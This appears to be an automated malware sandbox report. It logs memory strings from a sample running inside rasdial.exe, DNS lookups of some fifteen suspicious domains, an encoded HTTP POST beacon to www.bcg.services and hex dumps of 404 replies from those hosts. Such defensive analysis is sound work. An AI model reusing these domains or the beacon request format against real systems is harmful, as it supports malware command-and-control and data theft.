Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.75178.club
Source: global traffic	DNS traffic detected: DNS query: www.bcg.services
Source: global traffic	DNS traffic detected: DNS query: www.egldfi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.betmatchx.online
Source: global traffic	DNS traffic detected: DNS query: www.43kdd.top
Source: global traffic	DNS traffic detected: DNS query: www.lgdiamonds.info
Source: global traffic	DNS traffic detected: DNS query: www.jalan2.online
Source: global traffic	DNS traffic detected: DNS query: www.trendave.xyz
Source: global traffic	DNS traffic detected: DNS query: www.nb-shenshi.buzz
Source: global traffic	DNS traffic detected: DNS query: www.rysanekbeton.cloud
Source: global traffic	DNS traffic detected: DNS query: www.rafconstrutora.online
Source: global traffic	DNS traffic detected: DNS query: www.127358.win
Source: global traffic	DNS traffic detected: DNS query: www.prototype.garden
Source: global traffic	DNS traffic detected: DNS query: www.rtpwslot888gol.sbs
Source: global traffic	DNS traffic detected: DNS query: www.soainsaat.xyz

Source: unknown

HTTP traffic detected: POST /5onp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 200Host: www.bcg.servicesOrigin: http://www.bcg.servicesReferer: http://www.bcg.services/5onp/User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 78 44 71 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 64 4e 30 4c 42 52 45 59 37 48 2f 47 62 71 6f 49 77 6a 72 6c 2f 71 47 4a 73 70 38 7a 56 71 2f 52 67 3d 3d Data Ascii: xDq=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31dN0LBREY7H/GbqoIwjrl/qGJsp8zVq/Rg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 03:19:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-ray: wn32694:0.010/wa32694:D=1591Data Raw: 33 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 54 49 54 4c 45 3e 53 69 74 65 20 62 65 74 6d 61 74 63 68 78 2e 6f 6e 6c 69 6e 65 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 3c 2f 54 49 54 4c 45 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 3a 20 31 32 70 78 20 54 61 68 6f 6d 61 3b 7d 0a 09 09 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 63 6f 6c 6f 72 3a 23 31 46 38 34 46 46 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0a 09 09 61 20 7b 63 6f 6c 6f 72 3a 23 31 38 37 33 62 34 3b 7d 0a 09 09 64 69 76 20 7b 77 69 64 74 68 3a 20 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 20 31 30 30 70 78 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 30 70 78 3b 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 30 25 3b 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 0a 09 3c 68 31 3e 53 69 74 65 20 62 65 74 6d 61 74 63 68 78 2e 6f 6e 6c 69 6e 65 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 3c 2f 68 31 3e 0a 09 0a 09 54 6f 20 67 65 74 20 79 6f 75 72 20 73 69 74 65 20 68 65 72 65 2c 20 79 6f 75 20 6e 65 65 64 20 74 6f 20 61 64 64 20 69 74 20 74 6f 20 3c 61 20 72 65 6c 3d 27 6e 6f 66 6f 6c 6c 6f 77 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2e 74 6f 6f 6c 73 2f 3f 70 61 67 65 3d 35 27 3e 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 3c 2f 61 3e 0a 09 69 6e 20 74 68 65 20 26 6c 61 71 75 6f 3b 4d 79 20 53 69 74 65 73 26 72 61 71 75 6f 3b 20 73 65 63 74 69 6f 6e 2e 3c 62 72 3e 3c 62 72 3e 0a 09 49 66 20 79 6f 75 20 68 61 76 65 20 72 65 63 65 6e 74 6c 79 20 61 64 64 65 64 20 61 20 73 69 74 65 20 74 6f 20 79 6f 75 72 20 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 20 2d 20 77 61 69 74 20 31 35 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 79 6f 75 72 20 73 69 74 65 20 77 69 6c 6c 20 73 74 61 72 74 20 77 6f 72 6b 69 6e 67 2e 0a 0a 09 3c 62 72 3e 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 364<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 03:19:40 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 03:19:43 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 03:19:46 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 03:19:48 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Wed, 20 Nov 2024 03:19:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Wed, 20 Nov 2024 03:19:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Wed, 20 Nov 2024 03:19:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Wed, 20 Nov 2024 03:20:02 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 03:20:08 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 03:20:10 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 9a 4c 40 9b 43 af 7c f6 3e 26 86 87 14 22 85 0d 25 10 a5 c3 64 67 1c b9 62 74 c6 2a 67 d4 ca 63 0e de 74 19 5c 87 5d fa d0 39 f5 88 1b ec 9f 42 24 87 1d 8f 9a 40 10 25 72 f2 1f 66 c9 bc 87 55 52 e3 91 f1 30 d5 c7 6c 86 a9 ca 28 4e a0 e4 32 29 9f 84 a2 9a 3d 07 8d 02 89 20 6c fe 04 4d 9c 68 3c 2a 9f d5 85 98 d1 ea ae bc 13 08 16 9d 59 d9 3a 74 fe ae d0 79 e4 54 8f 2b c5 c9 2c 0f 15 12 01 5a 03 46 83 17 d2 01 39 b3 46 7b 5e 4c 3b 02 98 92 8e e5 fe 7d 22 e9 be 68 9a 38 b4 67 59 ce 88 c9 3e fd de a1 8e 71 2e f5 32 0b a5 10 68 c2 a1 93 1f 05 b6 a8 98 97 6b cc 6b 85 cc 92 04 5e e4 4f 9e 1e f1 fa cc a3 24 4e 68 e6 75 fd a6 ef 42 cb 2b 63 39 da 3e 14 28 10 c8 3a c9 c1 2e 2b 76 19 8f fb 36 49 e6 57 14 b6 8d 9c 60 dc 6c 32 88 fb c0 78 08 9a cd e7 63 78 7a c5 93 eb 2b 3a 9e 0e 7d 5f 85 95 2d 6f 68 57 ae 76 54 1e 1b b4 24 64 b5 83 1f d2 e3 6d 87 34 f8 8d 15 dc f6 f2 91 f2 37 94 8d c3 a0 2f e3 6b e9 e8 b7 17 cc 9f 44 df 61 2d 34 b1 5f 4a 74 f0 5d d7 13 20 f5 83 25 0c 36 04 24 8c f3 a4 1c 59 d5 76 4c ef 80 69 3e 06 46 fe ac 6a ba 33 04 0b b1 fd bd 62 8d 02 43 7b 1e 2e 99 97 7e d2 86 93 e0 e6 c1 cc 70 94 c3 c1 ee 2f b4 ff 0d 2b 0f 61 e1 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C\|>&"%dgbtgct\]9B$@%rfUR0l(N2)= lMh<Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 03:20:12 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1249date: Wed, 20 Nov 2024 03:20:15 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 03:20:21 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 